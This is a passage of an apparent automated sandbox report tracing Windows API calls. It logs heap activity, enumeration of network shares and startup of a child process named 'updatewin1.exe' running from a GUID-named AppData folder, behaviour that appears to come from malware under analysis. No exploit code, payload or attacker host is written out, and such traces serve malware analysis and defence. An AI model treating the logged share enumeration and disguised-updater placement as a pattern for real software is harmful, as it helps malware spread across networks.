lpMsg=0xe00fb74) returned 0 [0135.220] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12730 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12818 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13128 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13040 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12f58 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12900 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12bb8 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13868 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13950 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13a38 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13b20 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13c08 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd13cf0 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0b78 | out: hHeap=0x4970000) returned 1 [0135.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0135.221] SendMessageW (hWnd=0x9011a, Msg=0x8003, wParam=0x0, lParam=0x0) Thread: id = 96 os_tid = 0xa8c [0113.569] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xe14fee0 | out: lphEnum=0xe14fee0*=0xdce37f0) returned 0x0 [0115.915] WNetEnumResourceW (in: hEnum=0xdce37f0, lpcCount=0xe14fedc, lpBuffer=0xdce9fa0, lpBufferSize=0xe14fed8 | out: lpcCount=0xe14fedc, lpBuffer=0xdce9fa0, lpBufferSize=0xe14fed8) returned 0x0 [0115.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5da8 [0115.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5df0 [0115.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d28c0 [0115.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5e38 [0115.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dd228 [0115.915] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0xdce9fa0, lphEnum=0xe14fe28 | out: lphEnum=0xe14fe28*=0x49ba740) returned 0x0 [0117.137] WNetEnumResourceW (in: hEnum=0x49ba740, lpcCount=0xe14fe24, lpBuffer=0xdd0e108, lpBufferSize=0xe14fe20 | out: lpcCount=0xe14fe24, lpBuffer=0xdd0e108, lpBufferSize=0xe14fe20) returned 0x103 [0117.137] WNetCloseEnum (hEnum=0x49ba740) returned 0x0 [0117.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5df0 | out: hHeap=0x4970000) returned 1 [0117.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5da8 | out: hHeap=0x4970000) returned 1 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5da8 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5df0 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xe0) returned 0xdd12730 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d58e0 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5d18 [0117.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dd228 | out: hHeap=0x4970000) returned 1 [0117.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5e38 | out: hHeap=0x4970000) returned 1 [0117.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d28c0 | out: hHeap=0x4970000) returned 1 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5e38 [0117.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf25d8 [0117.137] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0xdce9fc0, lphEnum=0xe14fe28 | out: lphEnum=0xe14fe28*=0xe14fe44) returned 0x4b8 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5df0 | out: hHeap=0x4970000) returned 1 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5da8 | out: hHeap=0x4970000) returned 1 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x150) returned 0x49c5028 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5da8 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5df0 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34ff8 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35040 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5d18 | out: hHeap=0x4970000) returned 1 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d58e0 | out: hHeap=0x4970000) returned 1 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf25d8 | out: hHeap=0x4970000) returned 1 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5e38 | out: hHeap=0x4970000) returned 1 [0131.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12730 | out: hHeap=0x4970000) returned 1 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0131.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9a0 [0131.608] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0xdce9fe0, lphEnum=0xe14fe28 | out: lphEnum=0xe14fe28*=0xe14fe44) returned 0x4c6 [0131.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.670] WNetEnumResourceW (in: hEnum=0xdce37f0, lpcCount=0xe14fedc, lpBuffer=0xdce9fa0, lpBufferSize=0xe14fed8 | out: lpcCount=0xe14fedc, lpBuffer=0xdce9fa0, lpBufferSize=0xe14fed8) returned 0x103 [0131.670] WNetCloseEnum (hEnum=0xdce37f0) returned 0x0 [0131.670] SendMessageW (hWnd=0x9011a, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 97 os_tid = 0xb44 Process: id = "7" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" page_root = "0x1b13e000" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x34c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 98 os_tid = 0xaf4 [0117.773] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xde2489e0, dwHighDateTime=0x1d6d58a)) [0117.773] GetCurrentProcessId () returned 0xb10 [0117.773] GetCurrentThreadId () returned 0xaf4 [0117.773] GetTickCount () returned 0x114f76a [0117.773] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23796535592) returned 1 [0117.792] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0117.792] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x590000 [0117.794] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.794] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0117.794] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0117.795] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0117.795] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0117.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.795] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.795] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.796] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.796] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.796] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.796] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.797] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.797] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0117.797] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x214) returned 0x5907d0 [0117.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.798] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0117.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.798] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.798] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0117.798] GetCurrentThreadId () returned 0xaf4 [0117.798] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0117.798] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5909f0 [0117.799] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.799] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.799] SetHandleCount (uNumber=0x20) returned 0x20 [0117.799] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" " [0117.799] GetEnvironmentStringsW () returned 0x254e70* [0117.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0117.799] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x565) returned 0x5911f8 [0117.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5911f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0117.799] FreeEnvironmentStringsW (penv=0x254e70) returned 1 [0117.799] GetLastError () returned 0x0 [0117.800] SetLastError (dwErrCode=0x0) [0117.800] GetLastError () returned 0x0 [0117.800] SetLastError (dwErrCode=0x0) [0117.800] GetLastError () returned 0x0 [0117.800] SetLastError (dwErrCode=0x0) [0117.800] GetACP () returned 0x4e4 [0117.800] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x220) returned 0x591768 [0117.800] GetLastError () returned 0x0 [0117.800] SetLastError (dwErrCode=0x0) [0117.800] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.800] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0117.800] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0117.800] GetLastError () returned 0x0 [0117.800] SetLastError (dwErrCode=0x0) [0117.800] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0117.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.800] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0117.800] GetLastError () returned 0x0 [0117.801] SetLastError (dwErrCode=0x0) [0117.801] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0117.801] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.801] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艂妼㞕AĀ") returned 256 [0117.801] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艂妼㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0117.801] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艂妼㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¡\x05\x9cT\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0117.801] GetLastError () returned 0x0 [0117.803] SetLastError (dwErrCode=0x0) [0117.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艂妼㞕AĀ") returned 256 [0117.803] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艂妼㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0117.803] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艂妼㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 